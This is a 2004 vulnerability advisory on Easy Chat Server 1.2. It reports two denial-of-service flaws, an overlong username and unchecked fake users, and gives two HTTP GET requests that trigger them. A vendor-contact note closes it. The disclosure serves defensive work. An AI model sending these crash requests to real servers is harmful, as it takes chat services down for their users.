Donato Ferrante Application: Easy Chat Server http://www.echatserver.com/ Version: 1.2 Bugs: Multiple Vulnerabilities Date: 02-Jul-2004 Author: Donato Ferrante e-mail: fdonato@autistici.org web: www.autistici.org/fdonato xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 1. Description 2. The bugs 3. The code 4. The fix xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ---------------- 1. Description: ---------------- Vendor's Description: "Easy Chat Server is a easy, fast and affordable way to host and manage your own real-time communication software, it allows friends/colleagues to chat with you through a Web Browser (IE, Netscape, Mozilla, Opera etc.) on any computer (Windows, Linux, Solaris...) without any special plug-ins or software. It can help you setup your community chat rooms, collaborative work sessions or online meetings." xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------- 2. The bugs: ------------- The program has two DoS vulnerabilties, due to: - long username - fake users [1] The program doesn't correctly manage the username, in fact if you try to send a big username string to the server it will crash. [2] The program has no strong checks on the users who join into free rooms. In fact it's possible to add a large number of fake users and the chat server will go down. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------- 3. The code: ------------- To test the vulnerabilities: [1] GET /chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0 Host: http://[host] [2] GET /chat.ghp?username=FakeUser&password=&room=1&sex=0 Host: http://[host] ( this will add a fake user with name: FakeUser ) xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------ 4. The fix: ------------ Vendor was contacted. Bugs will be fixed in the next version. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx